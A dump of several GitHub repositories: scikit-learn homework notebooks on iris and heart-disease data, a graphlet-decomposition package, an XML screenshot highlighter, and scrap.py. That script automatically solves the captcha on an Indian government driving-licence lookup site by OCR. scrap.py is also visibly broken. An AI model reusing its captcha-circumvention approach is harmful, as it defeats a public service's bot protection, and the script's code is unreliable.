\nfeature_cols = ['sepal_length', 'sepal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy1 = accuracy_score(y_test, y_predict)\n#print(accuracy1)\n#-------------------------------------------------------------------------------------------\nfeature_cols = ['sepal_length', 'petal_length']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy2 = accuracy_score(y_test, y_predict)\n#print(accuracy2)\n#-------------------------------------------------------------------------------------------\n\nfeature_cols = ['sepal_length', 'petal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy3 = accuracy_score(y_test, y_predict)\n#print(accuracy3)\n#-------------------------------------------------------------------------------------------\n\nfeature_cols = ['sepal_width', 'petal_length']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy4 = accuracy_score(y_test, y_predict)\n#print(accuracy4)\n#-------------------------------------------------------------------------------------------\n\nfeature_cols = ['sepal_width', 'petal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy5 = accuracy_score(y_test, y_predict)\n#print(accuracy5)\n#-------------------------------------------------------------------------------------------\n\nfeature_cols = ['petal_length', 'petal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\n#print(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracy6 = accuracy_score(y_test, y_predict)\n#print(accuracy6)\n#-------------------------------------------------------------------------------------------\n\nlistOfResults2 = {'Sepal Length/ Sepal Width':accuracy1,'Sepal Length/ 
Petal Length':accuracy2, 'Sepal Length/ Petal Width': accuracy3, 'Sepal Width/ Petal Length':accuracy4, 'Sepal Width/ Petal Width':accuracy5, 'Petal Length/ Petal Width':accuracy6}\nprint(listOfResults2)\n\nprint('The best feature pair is Sepal Length & Petal Length with accuracy 0.983')\n\n\n# In[10]:\n\n\n#Question2g\n#BigQuestion: Doesthe “best feature pair” from part (f) contain of both “first best feature”and “second best feature” from part (e)? In other word, can we conclude that the “besttwo features” for classification are the first best feature along with the second best featuretogether?\nprint('False Claim! The best feature pair was Sepal Length & Petal Length from question f; however,'+ '\\n' + 'the best feature from question e was Petal Width and the second being Petal Length.'+ '\\n' + 'In conclusion, we cannot say that the best two features for classification are the first best feature along with the second best feature together; eventough; Petal Length was in both best features.')\n\n\n# In[43]:\n\n\n#Question2h\n#Optional Question: Justify your answer for part (g)! If yes, why? If no, why not?\nprint('For the pair accuracy test, this could be due to the length of both Petal and Sepal. Accuracy may work better due to the same components being length and length.' + '\\n' + 'It seems that Petal Length was in both best accuracy results, which contradict this claim')\n\n" }, { "alpha_fraction": 0.6989169716835022, "alphanum_fraction": 0.7104693055152893, "avg_line_length": 21.693988800048828, "blob_id": "98347ba3db994ca15b6c4f38bbd75d0bbd2c0e77", "content_id": "fb654fbbdfefb519f982c9b35f1f2fe6d4c16745", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4155, "license_type": "no_license", "max_line_length": 168, "num_lines": 183, "path": "/Predicting Heart Disease.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\n#Vrezh Khalatyan HW3 Question 1\n# The following line will import LogisticRegression and DecisionTreeClassifier Classes\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.tree import DecisionTreeClassifier\n\n\n# In[2]:\n\n\n# Importing the required packages and libraries\n# we will need numpy and pandas later\nimport numpy as np\nimport pandas as pd\n\n\n# In[3]:\n\n\n# reading a CSV file directly from Web, and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local device:\n\nhearts_df = pd.read_csv('/Users/anitribunyan/Desktop/HW3/Heart_s.csv')\n\n\n# In[4]:\n\n\n# checking the dataset by printing every 10 lines:\nhearts_df[0::10]\n\n\n# In[5]:\n\n\n# Creating the Feature Matrix for iris dataset:\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['Age','RestBP','Chol','RestECG', 'MaxHR', 'Oldpeak']\n\n# use the above list to select the features from the original DataFrame\nX = hearts_df[feature_cols] \n\n# print the first 5 rows\nX.head()\n\n\n# In[6]:\n\n\n# select a Series of labels (the last column) from the DataFrame\ny = hearts_df['AHD']\n\n# checking the label vector by printing every 10 values\ny[::10]\n\n\n# In[7]:\n\n\n# \"my_logreg\" is instantiated as an \"object\" of LogisticRegression \"class\". \n# \"my_decisiontree\" is instantiated as an \"object\" of DecisionTreeClassifier \"class\". 
\n\n\nmy_logreg = LogisticRegression()\n\nmy_decisiontree = DecisionTreeClassifier(random_state=5)\n\n\n# In[8]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, \n                                                    random_state=4)\n\n\n# In[9]:\n\n\n# Training ONLY on the training set:\nfrom sklearn.neighbors import KNeighborsClassifier\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\n\nknn.fit(X_train, y_train)\nmy_logreg.fit(X_train, y_train)\nmy_decisiontree.fit(X_train, y_train)\n\n\n# In[10]:\n\n\ny_predict_knn = knn.predict(X_test)\n\ny_predict_lr = my_logreg.predict(X_test)\n\ny_predict_dt = my_decisiontree.predict(X_test)\n\n\n# In[11]:\n\n\n# We can now compare the \"predicted labels\" for the Testing Set with its \"actual labels\" to evaluate the accuracy \n# Function \"accuracy_score\" from \"sklearn.metrics\" will perform the element-to-element comparison and returns the \n# proportion of correct predictions:\n\nfrom sklearn.metrics import accuracy_score\n\nscore_knn = accuracy_score(y_test, y_predict_knn)\nscore_lr = accuracy_score(y_test, y_predict_lr)\nscore_dt = accuracy_score(y_test, y_predict_dt)\n\nprint('KNN = ' + str(score_knn))\nprint('Logistic Regression = ' + str(score_lr))\nprint('Decision Tree = ' + str(score_dt))\nprint('\\n')\nprint('The best accuracy is with KNN and the worst is with the Decision Tree')\n\n\n# In[12]:\n\n\n# perform a feature engineering process called OneHotEncoding for the categorical features\nX = pd.get_dummies(hearts_df)\n# note: get_dummies on the full DataFrame also encodes the label column (AHD) into X, which leaks the target into the features\nX.head()\n\n\n# In[13]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, \n                                                    random_state=4)\n\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\n\nknn.fit(X_train, y_train)\nmy_logreg.fit(X_train, y_train)\nmy_decisiontree.fit(X_train, y_train)\n\ny_predict_knn = knn.predict(X_test)\n\ny_predict_lr = my_logreg.predict(X_test)\n\ny_predict_dt = my_decisiontree.predict(X_test)\n\nscore_knn = accuracy_score(y_test, y_predict_knn)\nscore_lr = accuracy_score(y_test, y_predict_lr)\nscore_dt = accuracy_score(y_test, y_predict_dt)\n\nprint('KNN = ' + str(score_knn))\nprint('Logistic Regression = ' + str(score_lr))\nprint('Decision Tree = ' + str(score_dt))\nprint('\\n')\nprint('The prediction accuracy for KNN is the same; however, for both Logistic Regression and Decision Tree the accuracy is 1.0, which can be a sign of overfitting')\n\n\n# In[14]:\n\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import metrics\n\nmy_logreg = LogisticRegression()\n\n# function cross_val_score performs Cross Validation:\naccuracy_list = cross_val_score(my_logreg, X, y, cv=10, scoring='accuracy')\n\nprint(accuracy_list)\n\n\naccuracy_cv = accuracy_list.mean()\n\nprint(accuracy_cv)\n\n" } ]
7
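The regression notebook above reports RMSE twice — once from a single train/test split and once from 10-fold cross-validation. A minimal, self-contained sketch of that comparison follows, using synthetic data since the notebook's CSV sits on a local drive:

```python
# Sketch: RMSE from a single split vs. 10-fold cross-validation.
# Synthetic data stands in for the notebook's local CSV (an assumption).
import numpy as np
from sklearn.datasets import make_regression
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.metrics import mean_squared_error

X, y = make_regression(n_samples=200, n_features=3, noise=10.0, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

linreg = LinearRegression().fit(X_train, y_train)
rmse_split = np.sqrt(mean_squared_error(y_test, linreg.predict(X_test)))

# cross_val_score returns *negative* MSE, so negate before taking the root
mse_list = cross_val_score(LinearRegression(), X, y, cv=10,
                           scoring='neg_mean_squared_error')
rmse_cv = np.sqrt(-mse_list).mean()

print(rmse_split, rmse_cv)
```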
Waxmard/skillstest
https://github.com/Waxmard/skillstest
3a4f0e93e8e8b1403858baf631dfd36fa68f4f64
2d4865ef4e7021b0d28efbb933362ea89c33a702
e72235ba02ea0688e74d4efa068ac88d4264a24a
refs/heads/main
2023-07-23T01:20:17.029273
2021-09-07T19:05:25
2021-09-07T19:05:25
402,566,526
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7520798444747925, "alphanum_fraction": 0.7637271285057068, "avg_line_length": 45.30769348144531, "blob_id": "11b7e818e8f21c0906af9d610facb791058376ac", "content_id": "66eada452753f568fe9034ac77583df5597a387b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 601, "license_type": "no_license", "max_line_length": 184, "num_lines": 13, "path": "/README.md", "repo_name": "Waxmard/skillstest", "src_encoding": "UTF-8", "text": "# Programming Assignment #1\n\n### This project takes screenshots from an Android phone (and their respective xml files) and outputs the same screenshots with their leaf-level components highlighted in yellow boxes.\n\n\n## Dependencies\n- This project needs `python3.9` or a later version to run properly.\n- `pillow` and `xml.etree.ElementTree` are the only imports, and both should work as long as `python3.9` is being used.\n\n## To Run\n- You must be in the `Programming-Assignment-Data` folder.\n- Run `python3.9 solution.py`\n- Ideally this project would be run on MacOS, since it was only tested on MacOS." }, { "alpha_fraction": 0.6061288714408875, "alphanum_fraction": 0.6255069971084595, "avg_line_length": 31.647058486938477, "blob_id": "7bcf39fbadc3c2b1efdb3a755233e4d2e3f942f0", "content_id": "d08552cad427e437b7a4284dcf3dc6f6fc202684", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2219, "license_type": "no_license", "max_line_length": 139, "num_lines": 68, "path": "/Programming-Assignment-Data/solution.py", "repo_name": "Waxmard/skillstest", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as ET\nfrom PIL import Image, ImageDraw\n\nxmlFiles = ['com.apalon.ringtones.xml',\n 'com.dropbox.android.xml',\n 'com.giphy.messenger-1.xml',\n 'com.giphy.messenger-2.xml',\n 'com.google.android.apps.transalte.xml',\n 'com.pandora.android.xml',\n 'com.yelp.android.xml']\n\ndef main():\n for file in xmlFiles:\n bounds = xmlParse(file)\n painter(bounds, file)\n\n# returns significant pixel bounds into a list of lists, each list has 4 coordinates of the corners of the rectangle that need to be drawn \ndef xmlParse(currentFile):\n\n # uses element tree to parse the xml file and saves root to root\n tree = ET.parse(currentFile)\n root = tree.getroot()\n\n # saves all string bounds from each node to allbounds\n allbounds = []\n for node in root.iter():\n attributes = node.attrib\n bounds = attributes.get('bounds')\n # [0,0][1440,2368] is always the edge of the screen, this highlight is trivial and not needed\n if (bounds is not None) and (bounds != \"[0,0][1440,2368]\"):\n allbounds.append(bounds)\n\n return convertInt(allbounds)\n\n# converts the string bounds from allbounds into lists (of 4 integer coordinates)\ndef convertInt(stringBounds):\n intbounds = []\n for bound in stringBounds:\n bound = bound.split(',')\n bound[0] = int(bound[0][1:])\n bound[2] = int(bound[2][:-1])\n tmp = bound[1].split(']')\n bound[1] = int(tmp[0])\n bound.insert(2, tmp[1])\n bound[2] = int(bound[2][1:])\n intbounds.append(bound)\n return intbounds\n\n# draws the rectangles on the image then outputs it in Preview\ndef painter(bounds, currentFile):\n # imageFile is the xml files' string name with .png extension instead of .xml\n imageFile = currentFile.replace('xml', 'png')\n\n img = Image.open(imageFile)\n draw = ImageDraw.Draw(img)\n \n # draws rectangle over all significant bounds specified within xml file\n for bound in bounds:\n draw.rectangle(\n 
(bound[0], bound[1], bound[2], bound[3]),\n outline=('yellow'),\n width=5\n )\n\n img.show()\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5875952243804932, "alphanum_fraction": 0.5941240191459656, "avg_line_length": 23.864864349365234, "blob_id": "8ce78b4ffc2f5172d34e412f30835333cd280bff", "content_id": "afcae6ed06160e444149c66e816c4f7036566234", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 919, "license_type": "no_license", "max_line_length": 84, "num_lines": 37, "path": "/practice.py", "repo_name": "Waxmard/skillstest", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as ET\n\ndef practice():\n tree = ET.parse('../practice/movies.xml')\n root = tree.getroot()\n\n # for child in root:\n # print(child.tag, child.attrib)\n\n # print([elem.tag for elem in root.iter()])\n # print()\n # print(ET.tostring(root, encoding='utf8').decode('utf8'))\n # for movie in root.iter('movie'):\n # print(movie.attrib)\n\n print()\n for description in root.iter('description'):\n print(description.text)\n\n # print()\n # for movie in root.findall(\"./genre/decade/movie/[year='1992']\"):\n # print(movie.attrib)\n\n # print()\n # for movie in root.findall(\"./genre/decade/movie/format/[@multiple='Yes']...\"):\n # print(movie.attrib)\n\ndef main():\n tree = ET.parse('com.apalon.ringtones.xml')\n root = tree.getroot()\n\n for child in root:\n print(child.tag, child.attrib)\n\n\nif __name__ == \"__main__\":\n practice()" } ]
3
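solution.py above parses Android bounds strings of the form `[x1,y1][x2,y2]` with a chain of `split` calls. A regex-based sketch of the same conversion (`parse_bounds` is a hypothetical helper, not part of the repo) is easier to verify:

```python
import re

# Sketch: parse an Android UI-dump bounds string "[x1,y1][x2,y2]" into ints.
def parse_bounds(bounds):
    x1, y1, x2, y2 = map(int, re.findall(r"-?\d+", bounds))
    return [x1, y1, x2, y2]

# Same output shape as convertInt() produces for one bound
assert parse_bounds("[0,48][1440,144]") == [0, 48, 1440, 144]
```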
KirillShmilovich/graphlets
https://github.com/KirillShmilovich/graphlets
8264d879c27382d2962b7b0971dff6da36d1adae
724d50666968ee755ca2ff1b172664c2233d2174
27647a6fee0c023063e019dd2b236507bfadf22f
refs/heads/master
2020-07-05T23:18:10.533978
2019-08-28T23:30:46
2019-08-28T23:30:46
202,813,922
8
0
null
null
null
null
null
[ { "alpha_fraction": 0.4849527180194855, "alphanum_fraction": 0.5580395460128784, "avg_line_length": 29.605262756347656, "blob_id": "9286e538d33fe86e819ba29e5fbaccc3b18791b1", "content_id": "93ab4456e2290dcdb914792f566fcdbe118f1ddb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1163, "license_type": "permissive", "max_line_length": 117, "num_lines": 38, "path": "/graphlets/utils.py", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "\"\"\"\nutil.py\n\nSome utility functions\n\"\"\"\nimport os\nimport numpy as np\nfrom sklearn.neighbors import BallTree, radius_neighbors_graph\nimport networkx as nx\n\n__all__ = [\"ORCA_PATH\", \"pbc\", \"orbits\", \"weights\", \"compute_graph\"]\n\nORCA_PATH = os.path.abspath(os.path.abspath(__file__) + \"../../../orca/orca.exe\")\n\n\ndef pbc(x0, x1, dims):\n delta = np.abs(x0 - x1)\n delta = np.where(delta > 0.5 * dims, delta - dims, delta)\n return np.sqrt((delta**2).sum(axis=-1))\n\n\norbits = np.array([\n 1, 2, 2, 2, 3, 4, 3, 3, 4, 3, 4, 4, 4, 4, 3, 4, 6, 5, 4, 5, 6, 6, 4, 4, 4, 5, 7, 4, 6, 6, 7, 4, 6, 6, 6, 5, 6, 7,\n 7, 5, 7, 6, 7, 6, 5, 5, 6, 8, 7, 6, 6, 8, 6, 9, 5, 6, 4, 6, 6, 7, 8, 6, 6, 8, 7, 6, 7, 7, 8, 5, 6, 6, 4\n],\n dtype=np.float)\nweights = 1. - np.log(orbits) / np.log(73.)\n\n\ndef compute_graph(X, r_cut, **kwargs):\n if kwargs[\"dims\"] is not None:\n BT = BallTree(X, metric=kwargs[\"metric\"], dims=kwargs[\"dims\"])\n else:\n BT = BallTree(X, metric=kwargs[\"metric\"])\n rng_con = radius_neighbors_graph(BT, r_cut, n_jobs=1, mode='connectivity')\n A = np.matrix(rng_con.toarray())\n G = nx.from_numpy_matrix(A)\n return G\n" }, { "alpha_fraction": 0.5851680040359497, "alphanum_fraction": 0.5894167423248291, "avg_line_length": 35.985713958740234, "blob_id": "0401b861d3473927714f9bf649eb73ef961d6a8c", "content_id": "2357fa806d57c5f99ca60ac7a082da239aa29136", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2589, "license_type": "permissive", "max_line_length": 128, "num_lines": 70, "path": "/graphlets/graphlets.py", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "\"\"\"\ngraphlets.py\nPython package for computing graphlets\n\nHandles the primary functions\n\"\"\"\nfrom .utils import *\n\nimport numpy as np\nimport networkx as nx\nfrom joblib import Parallel, delayed\nimport subprocess\n\n__all__ = [\"Graphlets\"]\n\n\nclass Graphlets():\n def __init__(self, X, dims=None, metric=\"euclidean\"):\n \"X is (time_steps, num_structures, p_dims)\"\n self.X = X\n self.metric = metric\n self.depth = 5\n self.dims = dims\n \n def make_graphs(self, r_cut, n_jobs=-1):\n if n_jobs==1:\n return [compute_graph(x, r_cut, dims=self.dims, metric=self.metric) for x in self.X]\n else:\n return Parallel(n_jobs=n_jobs)(delayed(compute_graph)(x, r_cut, dims=self.dims, metric=self.metric) for x in self.X)\n\n def decompose(self, G, t):\n in_file = f\".edgelist_{t}.dat\"\n out_file = f\".edgelist_{t}.out\"\n\n f = open(in_file, \"wb\")\n f.write(f\"{nx.number_of_nodes(G)} {nx.number_of_edges(G)}\\n\".encode())\n nx.write_edgelist(G, f, data=False)\n f.close()\n\n command = [ORCA_PATH, \"node\", str(self.depth), in_file, out_file]\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n decomposition = np.loadtxt(out_file) * weights\n command = [\"rm\", out_file, in_file]\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n 
return decomposition\n\n def compute(self, r_cut, reduce=True, n_jobs=-1):\n self.G = self.make_graphs(r_cut=r_cut, n_jobs=n_jobs)\n if n_jobs==1:\n G_total = np.asarray([self.decompose(G,t) for t,G in enumerate(self.G)])\n else:\n G_total = np.asarray(Parallel(n_jobs=n_jobs)(delayed(self.decompose)(G,t) for t,G in enumerate(self.G)))\n\n if reduce is True:\n G_sum = G_total.sum(axis=1)\n return G_sum / G_sum.sum(axis=1, keepdims=True)\n else:\n return G_total\n\n def scan_r_cut(self, r_min, r_max, num=25, n_jobs=-1):\n r_scan = np.empty(shape=num)\n if n_jobs==1:\n for i,r in enumerate(np.linspace(r_min,r_max,num=num)):\n self.G = self.make_graphs(r_cut=r, n_jobs=n_jobs)\n r_scan[i] = np.asarray([nx.number_of_edges(G) for G in self.G]).mean()\n else: \n for i,r in enumerate(np.linspace(r_min,r_max,num=num)):\n self.G = self.make_graphs(r_cut=r, n_jobs=n_jobs)\n r_scan[i] = np.asarray(Parallel(n_jobs=n_jobs)(delayed(nx.number_of_edges)(G) for G in self.G)).mean()\n return r_scan\n" }, { "alpha_fraction": 0.7459283471107483, "alphanum_fraction": 0.7459283471107483, "avg_line_length": 24.58333396911621, "blob_id": "8424547fb5a89e2073fb883a1492880fe7aec99a", "content_id": "1a0f68beef6ee1f47d595234f2aa0f21799bcf0b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 307, "license_type": "permissive", "max_line_length": 74, "num_lines": 12, "path": "/graphlets/tests/test_graphlets.py", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "\"\"\"\nUnit and regression test for the graphlets package.\n\"\"\"\n\n# Import package, test suite, and other packages as needed\nimport graphlets\nimport pytest\nimport sys\n\ndef test_graphlets_imported():\n \"\"\"Sample test, will always pass so long as import statement worked\"\"\"\n assert \"graphlets\" in sys.modules\n" }, { "alpha_fraction": 0.6551724076271057, "alphanum_fraction": 0.6551724076271057, "avg_line_length": 20.5, "blob_id": "cc733a4786d6bf223081e2f3b0b89e322e616a4d", "content_id": "6e0d702a28b81efef9f9eab2db5bc446a6b69c0f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 87, "license_type": "permissive", "max_line_length": 52, "num_lines": 4, "path": "/docs/getting_started.rst", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "Getting Started\n===============\n\nThis page details how to get started with graphlets. 
\n" }, { "alpha_fraction": 0.7207341194152832, "alphanum_fraction": 0.7440476417541504, "avg_line_length": 29.545454025268555, "blob_id": "2413ed072403e69b91dbe9da782a5c6e1a08ff04", "content_id": "25f557955fac67d30806e80f4f18ed3b40208292", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2018, "license_type": "permissive", "max_line_length": 135, "num_lines": 66, "path": "/README.md", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "graphlets\n==============================\n[//]: # (Badges)\n[![Build Status](https://travis-ci.org/KirillShmilovich/graphlets.svg?branch=master)](https://travis-ci.org/KirillShmilovich/graphlets)\n\nSmall package for performing graphlet decomposition.\n\n## Dependencies \n\nMake sure you have the following installed on your machine.\n\n- A C++ compiler supporting C++11\n- [scikit-learn](http://scikit-learn.org/stable/install.html)\n- [joblib](https://joblib.readthedocs.io/en/latest/installing.html)\n- [numpy](https://docs.scipy.org/doc/numpy/user/install.html)\n- [networkx](https://networkx.github.io/documentation/stable/install.html)\n\n## Installation \n\nWith all the dependencies installed you can install the package by running: \n\n```bash\n$ git clone https://github.com/KirillShmilovich/graphlets\n$ cd graphlets\n$ pip install -e .\n```\n\n(Note the `-e` is required to ensure `orca/orca.cpp` compiles properly)\n\n## Usage \n\nThe below examples shows how to compute a graphlet decomposition on a randomly generated set of points.\n\n```python \nimport graphlets\nimport numpy as np\n\n# Create a randomly generaterd data set with dimensions (n_frames, n_objects, n_dims)\na = np.random.rand(1000, 100, 3)\n\n# Instantiate a graphlet object using `a`\nG = graphlets.Graphlets(a)\n\n# Compute a graphlet decomposition, by default performing a\n# node reduction outputing a vector of graphlet frequencies \ndecomp = G.compute(r_cut = 0.1)\n```\n\n## Acknowledgements \n\nThis package is shipped with the C++ code to perform graphlet decomposition available here:\n\n- ORCA (https://github.com/thocevar/orca)\n\nProject based on the \n[Computational Molecular Science Python Cookiecutter](https://github.com/molssi/cookiecutter-cms) version 1.0.\n\n## References \n\n[1] Pržulj N, Biological Network Comparison Using Graphlet Degree Distribution, Bioinformatics 2007, 23:e177-e183.\n\n[2] Tomaž Hočevar, Janez Demšar, A combinatorial approach to graphlet counting, Bioinformatics, Volume 30, Issue 4, 15 February 2014, Pages 559–565\n\n### Copyright\n\nCopyright (c) 2019, Kirill Shmilovich\n" } ]
5
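The graphlets README shows `compute(r_cut=...)`; the class also exposes `scan_r_cut` for choosing the cutoff, which the README does not demonstrate. A usage sketch, assuming the package (and its bundled ORCA binary) is installed as described:

```python
import numpy as np
import graphlets

# (n_frames, n_objects, n_dims) point cloud, as in the README example
a = np.random.rand(100, 50, 3)
G = graphlets.Graphlets(a)

# Average edge count over a range of cutoffs, to pick a reasonable r_cut
edges_per_r = G.scan_r_cut(r_min=0.05, r_max=0.3, num=10)

# Per-frame graphlet-frequency vectors at the chosen cutoff
decomp = G.compute(r_cut=0.15)
print(edges_per_r, decomp.shape)
```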
Tarunpanyam/pycharm
https://github.com/Tarunpanyam/pycharm
442d55af72ea22759ffe21d469c66484c4b156f8
d5062ced832ffd0cf97a1765a6547328494e4387
0972ae12b2178c0369721b8615e2ad4561864ea6
refs/heads/master
2022-04-24T10:48:27.356024
2020-04-25T08:07:05
2020-04-25T08:07:05
258,718,989
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5775943994522095, "alphanum_fraction": 0.5864804983139038, "avg_line_length": 29.84848403930664, "blob_id": "ad8594175f21ae9b9e22dc9a1b2512697081e150", "content_id": "92bfb0a6766a70eda28f0ee7fa836d48f8ffeccc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3151, "license_type": "no_license", "max_line_length": 95, "num_lines": 99, "path": "/scrap.py", "repo_name": "Tarunpanyam/pycharm", "src_encoding": "UTF-8", "text": "import lxml.html\r\nimport urllib.request\r\nimport pprint\r\nimport http.cookiejar as cookielib\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\nimport pytesseract\r\nimport sys\r\nimport shutil\r\nimport threading\r\nfrom BeautifulSoup import BeautifulSoup as soup\r\ndef form_parsing(html):\r\n tree = lxml.html.fromstring(html)\r\n data = {}\r\n for e in tree.cssselect('form input'):\r\n if e.get('name'):\r\n data[e.get('name')] = e.get('value')\r\n return data\r\ndef load_captcha(html):\r\n tree = lxml.html.fromstring(html)\r\n img_data = tree.cssselect('div#recaptcha img')[0].get('src')\r\n img_data = img_data.partition(',')[-1]\r\n binary_img_data = img_data.decode('base64')\r\n file_like = BytesIO(binary_img_data)\r\n img = Image.open(file_like)\r\n return img\r\nresponse = urllib.request.urlopen('https://parivahan.gov.in/rcdlstatus/?pur_cd=101')\r\nhtml = response.read()\r\ntext = html.decode()\r\n# geting the no of forms to fill\r\nform = form_parsing(html)\r\npprint.pprint(form)\r\n# delling with cpacha image\r\nimg = get_captcha(html)\r\nimg.save('captcha_original.png')\r\ngray = img.convert('L')\r\ngray.save('captcha_gray.png')\r\nbw = gray.point(lambda x: 0 if x < 1 else 255, '1')\r\nbw.save('captcha_thresholded.png')\r\ns=pytesseract.image_to_string(bw)\r\ndl=input(' Enter your Driving License Number')\r\ndb=input('Enter your Date of Birth in dd-mm-yyyy format')\r\nparameters = {'Driving Licence No.':dl, 'Date Of Birth': db,'Enter Verification Code': s}\r\nlink = requests.post('https://parivahan.gov.in/rcdlstatus/?pur_cd=101, data = parameters)\r\nl=requests.get( link )\r\na=m(l)\r\n# deling with licence picture\r\ndef m(l):\r\n html = l\r\n tags = filter( html )\r\n for tag in tags:\r\n src = tag.get( \"src\" )\r\n if src:\r\n src = re.match( r\"((?:https?:\\/\\/.*)?\\/(.*\\.(?:png|jpg)))\", src )\r\n if src:\r\n (link, name) = src.groups()\r\n if not link.startswith(\"http\"):\r\n link = \"https://www.drivespark.com\" + link\r\n _t = threading.Thread( target=requesthandle, args=(link, name.split(\"/\")[-1]) )\r\n _t.daemon = True\r\n _t.start()\r\n\r\n while THREAD_COUNTER >= THREAD_MAX:\r\n pass\r\n\r\n while THREAD_COUNTER > 0:\r\n pass\r\n\r\nTHREAD_COUNTER = 0\r\nTHREAD_MAX = 5\r\n\r\ndef get_source( link ):\r\n r = requests.get( link )\r\n if r.status_code == 200:\r\n return soup( r.text )\r\n else:\r\n sys.exit( \"[~] Invalid Response Received.\" )\r\n\r\ndef filter( html ):\r\n imgs = html.findAll( \"img\" )\r\n if imgs:\r\n return imgs\r\n else:\r\n sys.exit(\"[~] No images detected on the page.\")\r\n\r\ndef requesthandle( link, name ):\r\n global THREAD_COUNTER\r\n THREAD_COUNTER += 1\r\n try:\r\n r = requests.get( link, stream=True )\r\n if r.status_code == 200:\r\n r.raw.decode_content = True\r\n f = open( name, \"wb\" )\r\n shutil.copyfileobj(r.raw, f)\r\n f.close()\r\n print (\"[*] Downloaded Image: %s\" % name)\r\n except Exception, error:\r\n print (\"[~] Error Occured with %s : %s\" % (name, error))\r\n THREAD_COUNTER -= 1" } ]
1
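scrap.py binarizes the captcha with `gray.point(lambda x: 0 if x < 1 else 255, '1')` — a cutoff of 1 that leaves almost every pixel white. A sketch of the same PIL/pytesseract step with a mid-range threshold (128 is an assumption; the right value depends on the captcha):

```python
from PIL import Image
import pytesseract

# 'captcha_original.png' is assumed to exist (e.g. saved by load_captcha above)
img = Image.open('captcha_original.png')
gray = img.convert('L')
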